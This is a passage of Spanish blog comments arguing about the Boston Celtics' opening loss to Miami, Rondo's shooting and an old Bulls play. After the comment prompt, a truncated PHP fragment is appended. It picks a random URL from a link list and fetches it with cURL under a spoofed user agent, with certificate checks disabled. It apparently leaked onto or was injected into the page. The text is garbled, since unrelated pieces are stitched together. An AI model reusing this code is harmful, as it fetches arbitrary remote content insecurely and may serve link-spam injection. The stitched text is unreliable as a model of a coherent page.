  38. AndiD dice:
    #38

    GreenPride:
    Gran lanzamiento de Paxson en ese vídeo y muy buena jugada diseñada por Phil, que por cierto el propio Paxson reconoció que MJ le dijo: “Si me sobremarcan preparáte para lanzar porque te pasaré el balón”.

    Green, creo que la jugada a la que te refieres es la de Steve Kerr en la final contra Utah…

      Citar

  39. GreenPride dice:
    #39

    Es ciero AndiD me ha traicionado la memoria…. llevas toda la razón

      Citar

  40. HisRoyalAirness dice:
    #40

    TheDeerHunter: Es personal. A mí me jodió mucho.

    A mí también me jode, sobre todo porque ahí se esfumó el anillo de Chuck, y las posibilidades de campeonato de uno de los equipos más divertidos y buenrrollistas que recuerdo.

    Pero hay que reconocer que la jugada es brillante en lo táctico

      Citar

  41. rumbero dice:
    #41

    Esteban:
    ah me falto PIERCE, aunque no le quede mucho tiempo como joven

    Hombre Esteban, entonces de ‘viejo’ solo nos queda Garnett. Yo creo que con la temporada que tuvo y teniendo en cuenta que hizo falta la mejor versión que hemos visto de Lebron para tumbarlos, los verdes estaban obligados a moverse para volver a intentarlo otra vez este año

      Citar

  42. Esteban dice:
    #42

    Desp del partido de hoy afirmo mis comentarios sobre boston,
    Garnett ya no puede dominar ni a bosh..
    El tiempo ha hecho estragos en el fisico de pierce, y no es tan viejo
    Rondo no tiene capacidad ofensiva para llevar a sus hombros el equipo
    Terry se mantiene en la irregularidad del año pasado

    Green no peso, y como dije el es la clave, si no los lleva el a otro nivel, boston es un equipo de segunda ronda

      Citar

  43. rumbero dice:
    #43

    Esteban:
    Desp del partido de hoy afirmo mis comentarios sobre boston,
    Garnett ya no puede dominar ni a bosh..
    El tiempo ha hecho estragos en el fisico de pierce, y no es tan viejo
    Rondo no tiene capacidad ofensiva para llevar a sus hombros el equipo
    Terry se mantiene en la irregularidad del año pasado

    Green no peso, y como dije el es la clave, si no los lleva el a otro nivel, boston es un equipo de segunda ronda

    Que manera de enterrar equipos en la jornada inaugural cuando juegan en la pista del equipo campeón. El año pasado tb hubieron unas cuantas de estas a los verdes antes de que empezaran PO y mira luego. Leo muchas cosas que me chirrian y me esperaré a ver el partido, pero leer que Rondo no tiene capacidad para llevar el equipo sobre sus hombros me puede

      Citar

  44. Esteban dice:
    #44

    bueno rumbero, mas alla de q enfrente este HEAT, un contendiente no se puede comer semejante paliza, miami nisiquiera necesito q LEBRON transpirara y boston nunca pudo ponerlos minimamente en aprietos

      Citar

  45. TheDeerHunter dice:
    #45

    ¿Semejante paliza 13 de diferencia con los Heat clavando 120?
    No sé… como mínimo bastante atrevido el comentario

      Citar

  46. Esteban dice:
    #46

    TheDeerHunter:
    ¿Semejante paliza 13 de diferencia con los Heat clavando 120?
    No sé… como mínimo bastante atrevido el comentario

    es evidente que no viste el juego, la paliza puede no haberse materializado en el resultado, pero fue una fiesta del HEAT de principio a fin, y como te digo, cerraron sin lebron, quien hizo lo que quiso mientras estuvo en cachan y repito, creo que no sudo

      Citar

  47. TheDeerHunter dice:
    #47

    Siendo regular no creo que fuera el único que no sudara.
    Los Heat se llevaron alguna que otra “paliza” así el año pasado… y algún que otro susto gordo también.

      Citar

  48. Jabho dice:
    #48

    Esteban:
    Desp del partido de hoy afirmo mis comentarios sobre boston,
    Garnett ya no puede dominar ni a bosh..
    El tiempo ha hecho estragos en el fisico de pierce, y no es tan viejo
    Rondo no tiene capacidad ofensiva para llevar a sus hombros el equipo
    Terry se mantiene en la irregularidad del año pasado

    Green no peso, y como dije el es la clave, si no los lleva el a otro nivel, boston es un equipo de segunda ronda

    A mi lo que me preocuparia es verlos finos en el primer partido… a Garnett y Pierce no los espero hasta después del All Star, y Green tienen que coger ritmo. Tiempo al tiempo.

      Citar

  49. nach dice:
    #49

    Equipo con jugadores de cierta edad, van a ir de menos a más descaradísimamente. Es cuestión de tiempo, Garnett y Pierce llegarán, igual que lo hará Terry.

    Joder, lo de Rondo es una lástima suprema, lo tiene TODO para ser uno de los jugadores más determinantes de la NBA pero sigue emperrado en no aprender a tirar, condiciona muchísimo a sus compañeros el que lo floten y liberen a un defensa para hacer ayudas. No digo que se convierta en Nash, pero joder, que los triples más solo que la 1 sea capaz de tirarlos más o menos.

    Por otra parte, parece que este año, por lo menos de inicio, van a intentar correr algo más con Rondo, Lee y Terry, está por ver el papel de Bradley cuando vuelva también.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>